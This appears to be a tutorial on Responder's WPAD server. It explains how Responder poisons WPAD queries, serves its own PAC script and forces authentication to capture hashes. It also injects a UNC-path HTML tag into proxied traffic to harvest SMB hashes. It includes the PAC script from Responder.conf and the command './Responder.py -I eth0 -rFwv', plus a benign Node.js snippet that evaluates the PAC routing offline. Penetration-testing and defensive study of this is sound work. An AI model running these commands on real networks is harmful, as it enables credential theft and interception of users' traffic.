Responder WPAD Server
WPAD stands for Web Proxy Auto-Discovery; it is the mechanism a browser uses to locate a Proxy Auto-Configuration (PAC) file.
This protocol was first implemented in Internet Explorer 5.0, and its purpose is to automatically configure the proxy settings of the user's browser.
There are several ways to configure WPAD:
- Manually insert a WPAD server in IE -> Options -> Connection Settings -> LAN Settings.
- DHCP option 252.
- Multicast/broadcast WPAD lookup.
Responder takes advantage of this: it poisons WPAD broadcast/multicast queries and redirects the victim's browser to its own WPAD server.
There are two scenarios here:
- Force authentication when serving the WPAD file (Responder switch -F) and grab the hash.
  - Once the authentication has been grabbed, all browser requests will be proxied through Responder.
- Just serve the file, then proxy all browser requests.
Responder's WPAD script is specified in Responder.conf and should be changed to suit your needs (at least the hardcoded name "ProxySrv"):
WPADScript = function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "ProxySrv")||shExpMatch(host, "(.ProxySrv|ProxySrv)")) return "DIRECT"; return 'PROXY ProxySrv:3128; PROXY ProxySrv:3141; DIRECT';}
This function contains the following directives:
- Use a proxy server for all connections.
- Responder's proxy server is set to ProxySrv:3128 and ProxySrv:3141.
- For any *.ProxySrv request, for a plain single-label hostname (isPlainHostName), or if the request is for localhost/127.0.0.1, don't use the proxy.
- If the proxy server fails for whatever reason, access the website directly.
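To check what the script above actually decides for a given destination, here is an added example (not Responder's own code) that implements the three PAC helper functions the script uses, evaluates the FindProxyForURL function from Responder.conf as shipped, and reports the decision for a constructed list of hostnames. It assumes Node.js; the hostnames in sampleHosts are hypothetical and not from the page.

```javascript
// Added example, not Responder's own code: minimal implementations of the PAC
// helper functions used by the WPAD script above, so the script's routing
// decisions can be checked offline for any hostname (e.g. when auditing a
// captured WPAD file).
function isPlainHostName(host) {
  return !host.includes("."); // no dots: single-label intranet name
}

function dnsDomainIs(host, domain) {
  // PAC semantics: true when host ends with domain (case-insensitive)
  return host.toLowerCase().endsWith(domain.toLowerCase());
}

function shExpMatch(str, shexp) {
  // Shell glob: '*' matches any run, '?' one char; everything else is literal.
  // Note that "(a|b)" is therefore not alternation, just literal text.
  const escaped = shexp.replace(/[.+^${}()|[\]\\]/g, "\\$&");
  const re = "^" + escaped.replace(/\*/g, ".*").replace(/\?/g, ".") + "$";
  return new RegExp(re).test(str);
}

// The FindProxyForURL function from Responder.conf, reformatted only
function FindProxyForURL(url, host) {
  if ((host == "localhost") || shExpMatch(host, "localhost.") ||
      (host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT";
  if (dnsDomainIs(host, "ProxySrv") || shExpMatch(host, "(.ProxySrv|ProxySrv)"))
    return "DIRECT";
  return "PROXY ProxySrv:3128; PROXY ProxySrv:3141; DIRECT";
}

// Evaluate the script for each host; returns an object host -> decision
function evaluatePac(hosts) {
  const decisions = {};
  for (const h of hosts) decisions[h] = FindProxyForURL("http://" + h + "/", h);
  return decisions;
}

// Constructed sample destinations (hypothetical names, not from the page)
const sampleHosts = ["localhost", "127.0.0.1", "intranet", "fs01.corp.example",
                     "www.example.com", "ProxySrv"];

console.table(evaluatePac(sampleHosts));
```

Every destination that is neither local, a plain hostname, nor under ProxySrv is routed through the two proxy entries, which is why a client that accepts a poisoned WPAD answer sends essentially all of its external browsing through Responder.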
Once the requests go through Responder's proxy, an HTML tag containing a UNC path is injected into all proxied requests to grab SMB hashes. This payload can be changed in Responder.conf with the setting "HTMLToInject =".
Responder's WPAD proxy server is activated with the "-w" command line switch.
Forcing WPAD file authentication is done with the "-F" command line switch.
Example:
./Responder.py -I eth0 -rFwv